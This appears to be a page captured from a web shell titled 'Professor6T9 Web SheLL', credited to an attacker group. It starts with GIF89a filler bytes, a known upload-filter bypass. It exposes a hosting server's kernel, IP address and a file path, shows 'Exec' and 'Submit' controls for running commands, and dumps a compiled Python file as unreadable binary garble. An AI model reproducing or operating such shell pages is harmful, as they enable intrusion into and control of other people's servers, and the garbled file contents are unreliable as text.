GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
opt
/
cloudlinux
/
venv
/
lib64
/
python3.11
/
site-packages
/
pylint_django
/
tests
/
input
/
__pycache__
[ HOME ]
Exec
Submit
File Name : func_noerror_classviews.cpython-311.pyc
� � h� � � � d Z ddlmZ ddlmZ ddlmZmZmZ ddl m Z G d� de� � Z G d� d e� � Z G d � de� � Z G d� d e� � Z G d� de� � Z G d� de� � Z G d� de� � Z G d� de� � Z G d� de� � Z G d� dej � � Z G d� de� � Z G d� de � � ZdS )z` Checks that Pylint does not complain about attributes and methods when using Class-based Views � )�models��JsonResponse)� DetailView�TemplateView�View)� CreateViewc � � e Zd Zd� ZdS )� BoringViewc �, � | j | j | j d�S )N��request�args�kwargsr )�selfr s ��/builddir/build/BUILD/cloudlinux-venv-1.0.8/venv/lib/python3.11/site-packages/pylint_django/tests/input/func_noerror_classviews.py�get_context_datazBoringView.get_context_data s � ��<���d�k�R�R�R� N)�__name__� __module__�__qualname__r � r r r r s( � � � � � �S� S� S� S� Sr r c � � e Zd Zd� ZdS )�JsonGetViewc �&